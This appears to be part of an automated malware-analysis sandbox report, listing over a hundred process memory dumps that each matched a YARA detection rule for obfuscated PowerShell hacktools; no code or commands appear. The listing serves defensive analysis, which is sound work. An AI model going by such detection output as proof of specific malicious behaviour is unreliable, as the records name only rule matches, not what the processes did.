Source: 0000000D.00000000.16298887951.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000000.16299447192.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000000.16300196558.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000000.16300331558.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000002.16300827017.00080000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000002.16301298263.002E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000002.16301400720.00306000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000003.16300533489.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000E.00000002.16532104215.01210000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000E.00000002.16532260705.01300000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000E.00000002.16532283238.01307000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000E.00000002.16538668028.044ED000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000000.16423513415.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000000.16423696288.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000000.16424010643.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000000.16424296226.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000002.16425519548.002F0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000002.16425863355.005E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000003.16424469175.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000000.16427157568.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000000.16427626069.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000000.16427801984.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000000.16427909144.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000002.16428253744.00086000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000002.16428237813.00060000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000002.16428345115.002F0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000003.16428100823.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000000.16435013085.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000000.16435224699.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000000.16434819215.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000000.16435443949.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000003.16435713321.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000016.00000002.16550395399.00260000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000016.00000002.16550953531.00530000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000017.00000002.16557924955.01C50000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000016.00000003.16441425216.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000016.00000000.16440999829.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000000.16453096494.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000000.16453674876.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000000.16453891780.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000002.16455102821.000E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000002.16455015171.000B0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000003.16454255633.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000000.16453553931.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000000.16458141609.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000000.16458311882.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000000.16458528912.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000000.16458843270.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000002.16459856147.00160000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000002.16459880486.00186000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000002.16459967558.003A0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000003.16459226751.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000000.16460451553.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000000.16460674878.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000000.16460822174.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000000.16461111447.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16468544452.00110000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16470994291.0153D000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16471109913.01660000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16471226487.016C0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16469158345.004B1000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16468815770.003E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16468838264.00406000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16461517453.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16465931308.0011C000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468242022.004B0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468174726.004A5000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468191650.004AC000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000000.16466455838.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468206147.00481000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000002.16480249069.00400000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000002.16480203790.003E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000002.16480269231.00426000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000003.16466700886.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000000.16472465532.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000000.16472603519.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000000.16472892522.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000000.16472742485.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468140620.004B2000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000002.16473840713.00340000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000002.16473711541.00270000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000002.16473904470.00366000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000000.16475070317.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000000.16475268349.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000003.16473177431.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000000.16474820967.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000000.16474461723.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000003.16476187232.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000000.16499978274.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000000.16500170033.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000000.16500483468.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567553929.00321000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567604876.004A0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567440908.002D0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567501646.0030F000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16501342355.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567480851.002FF000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503064468.0030C000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503079730.0030F000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000000.16500917401.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503118310.00306000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503179760.002D1000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16506373335.00327000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503265026.002F9000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16506450727.0031C000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16506487131.0030F000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503292449.00300000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16507436398.002FD000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000000.16503997937.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000000.16505979814.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000000.16503831032.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000000.16505682606.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000002.16571554431.00098000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000002.16571520029.00070000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000002.16571590847.000AF000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000002.16571752140.00440000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000003.16506433003.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
